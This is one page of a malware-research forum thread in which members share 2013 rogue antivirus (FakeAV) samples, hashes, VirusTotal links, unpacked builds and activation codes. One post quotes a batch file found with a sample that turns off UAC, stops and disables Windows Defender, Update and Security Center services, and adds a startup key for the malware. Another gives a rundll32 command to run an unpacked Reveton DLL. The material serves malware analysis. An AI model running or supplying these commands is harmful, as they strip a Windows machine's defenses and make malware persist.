KernelMode.info

A forum for reverse engineering, OS internals and malware analysis
https://www.kernelmode.info/forum/

Rogue Antimalware (FakeAV, 2013 year)

https://www.kernelmode.info/forum/viewtopic.php?f=16&t=75

Page 8 of 15

Re: Rogue Antimalware (FakeAV, 2013 year)

PostPosted:Sat Jul 13, 2013 6:15 pm
by Win32:Virut
System Care Antivirus - 3 samples

Re: Rogue Antimalware (FakeAV, 2013 year)

PostPosted:Mon Jul 15, 2013 9:49 am
by ISergey256
Win32:Virut wrote:8 samples
Antivirus System
Activation Code: ?O?Z?L?W?I?T?F?Q?C?N?Y?K?V?H?S?E

FakeAV

PostPosted:Sat Jul 27, 2013 7:13 am
by Maxstar
I'm looking for the following sample.

MD5: 82c58b195fc854387e46893f32b026a6
https://www.virustotal.com/en/file/916c ... 374867056/

Thanks ;)

Re: FakeAV

PostPosted:Sat Jul 27, 2013 8:07 am
by p4r4n0id
attached!

Re: Rogue Antimalware (FakeAV, 2013 year)

PostPosted:Sat Jul 27, 2013 12:52 pm
by Xylitol
http://www.bleepingcomputer.com/virus-r ... -antivirus
Due to a request here is the unpacked and with anti-vm fixed.
https://www.virustotal.com/en/file/daf1 ... 374930794/

Re: Rogue Antimalware (FakeAV, 2013 year)

PostPosted:Sat Jul 27, 2013 4:10 pm
by Win32:Virut
System Care Antivirus - 19 files

Re: Rogue Antimalware (FakeAV, 2013 year)

PostPosted:Sun Jul 28, 2013 7:48 pm
by secObs
Internet Security

Image

MD5: 927921207a10dfb7fd7e0684c461527d
SHA-1: ae11df6844d12147c9507d78af057de1c51d6280

Re: Rogue Antimalware (FakeAV, 2013 year)

PostPosted:Mon Jul 29, 2013 4:58 pm
by andrew9406
Xylitol wrote:http://www.bleepingcomputer.com/virus-r ... -antivirus
Due to a request here is the unpacked and with anti-vm fixed.
https://www.virustotal.com/en/file/daf1 ... 374930794/
activation codes:
AA39754E-715219CE (seems to work with most winwebsec rogues)
AF03E-A1B69411-5E496BEE-92A70D00-1AD697F6

Re: Rogue Antimalware (FakeAV, 2013 year)

PostPosted:Thu Aug 01, 2013 8:45 pm
by Cody Johnston
Attentive Antivirus

Image

There were a few other goodies packaged with this as well

There are some other files in here as well:

1. 3X9DV7p6.exe
MD5: e7a7fb4d2c8b8d9594582618f099e337
https://www.virustotal.com/en/file/2691 ... 375387434/

2. 1891695800740633560.exe
MD5: c9d3ab7fa4d7ab64acebfa518ecb88bb
https://www.virustotal.com/en/file/2ac4 ... 375387391/

Some batch file found in the folder (Mad Skillz):
Code: Select all
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
sc stop windefend
sc stop msmpsvc
sc stop wuauserv
sc stop wscsvc
ping localhost -w 1000 -n 3 > nul
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc config wuauserv start= disabled
sc config wscsvc start= disabled
sc config luafv start= disabled
ping localhost -w 1000 -n 2 > nul
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v AA2014 /t REG_SZ /d C:\ProgramData\3X9DV7p6\3X9DV7p6.exe
There are other files in the attach but those are most interesting.

Re: Rogue Antimalware (FakeAV, 2013 year)

PostPosted:Fri Aug 02, 2013 1:09 pm
by ISergey256
Live Security Professional
to run -> rundll32 DUMP_003E0000-003EF000_unpack_reveton.dll, XFG00

original https://www.virustotal.com/ru/file/410f ... /analysis/
unpacked https://www.virustotal.com/ru/file/2f8c ... /analysis/
fakeav memory dump https://www.virustotal.com/ru/file/3f12 ... /analysis/

activation code F9292-QRT38-U9291-29291-3923F
All times are UTC
Page 8 of 15
Powered by phpBB® Forum Software © phpBB Group
https://www.phpbb.com/